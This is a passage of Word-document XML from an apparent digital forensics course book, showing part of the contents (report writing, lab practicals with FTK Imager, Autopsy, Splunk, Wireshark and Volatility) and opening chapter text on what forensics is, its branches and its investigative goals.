        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8 Forensic Report Writing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9 Presenting Evidence — Affidavits and Expert Testimony</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.10 Case Studies — Indian and International</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.11 Emerging Trends</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Practical Companion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 1 — Evidence Acquisition with FTK Imager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 2 — Autopsy: Deleted File Recovery and Activity Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 3 — Windows Registry Forensic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 4 — Windows Event Log Analysis with Splunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 5 — Network Forensics with Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 6 — Memory Forensics with Volatility 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 7 — Browser and Email Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 8 — Splunk Multi-Source Correlation and IR Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Capstone — Full Forensic Investigation Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Syllabus Coverage Map and Quick Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Syllabus Coverage Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Revision — Ten Things to Remember</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Glossary</w:t>
      </w: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I — Foundations of Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What Is Digital Forensics?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the branch of forensic science that deals with finding, collecting, preserving, examining, analysing and reporting information that is stored or transmitted in digital form — in such a way that the results can be trusted and, if needed, presented in a court of law.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The word </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simply means “suitable for use in a court”. So digital forensics is not just recovering data or fixing a broken computer. Two things make it different from ordinary IT work: the original evidence must be protected from change, and every step must be recorded so that another expert can repeat it and get the same result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In short, digital forensics tries to answer six questions about an incident: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> did it, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">what</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was done, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it happened, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it started, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it was done, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">what evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> proves all of this.</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A simple case</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A company suspects that an employee copied confidential design files to a USB drive before resigning. A forensic investigator can check whether a USB device was connected, which files were opened just before that, and at what time it all happened. The investigator then combines these traces into a clear story supported by evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why is digital forensics needed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Almost every activity today — banking, communication, shopping, office work — runs on computers, phones, networks and cloud services. Because of this, crimes such as hacking, fraud, data theft, online harassment and even traditional crimes (murder, kidnapping, terrorism) leave digital traces. Digital forensics gives investigators a disciplined way to discover and understand those traces, even when the offender has tried to delete or hide them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Characteristics of a forensic investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scientific</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — based on proven methods, not guesses or assumptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeatable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — another competent investigator following your notes should reach the same result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity-focused</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the original evidence must not be changed. Work is done on copies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Documented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — every action, tool and observation is written down.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Legally aware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the investigator works only within proper legal authority.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Scope and Types of Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The scope of digital forensics is much wider than a computer’s hard disk. Evidence can sit on computers and servers, mobile phones, networks, cloud services, removable media (pen drives, memory cards), email systems, and even IoT devices. Because each source stores data differently, digital forensics is divided into several branches.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examines</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Typical evidence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Disk (Computer) Forensics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on hard disks, SSDs, USB drives and memory cards — the file system, deleted files and operating-system traces.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Files, deleted files, registry, logs, browser history, metadata</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Memory (RAM) Forensics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contents of RAM captured from a running system. RAM disappears when power is lost, so it is captured live.</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Running processes, open network connections, passwords, in-memory malware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Network Forensics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 traffic and network device records, to see who talked to whom, when, and what was sent.</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Packet captures (PCAP), firewall logs, DNS logs, NetFlow</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Mobile Forensics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Smartphones and tablets (Android, iOS).</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Calls, SMS, chats, app data, photos, GPS locations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Cloud Forensics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and logs stored with cloud providers (AWS, Azure, Google Cloud, Google Drive, etc.).</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Access logs, audit trails, snapshots, stored files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Email Forensics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Email messages and especially their hidden header information.</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Headers, routing path, IP addresses, attachments</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Remember</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Real investigations rarely use only one branch. A single data-theft case may need disk forensics (the laptop), memory forensics (the running malware), network forensics (the data leaving), and email forensics (the phishing email that started it).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Goals of a Forensic Investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Find out what happened</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — reconstruct the events in the correct order (a timeline).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the people, accounts and devices involved</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — who did it, from which system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Find and preserve evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that supports or disproves the claim, without damaging it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Show how it was done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
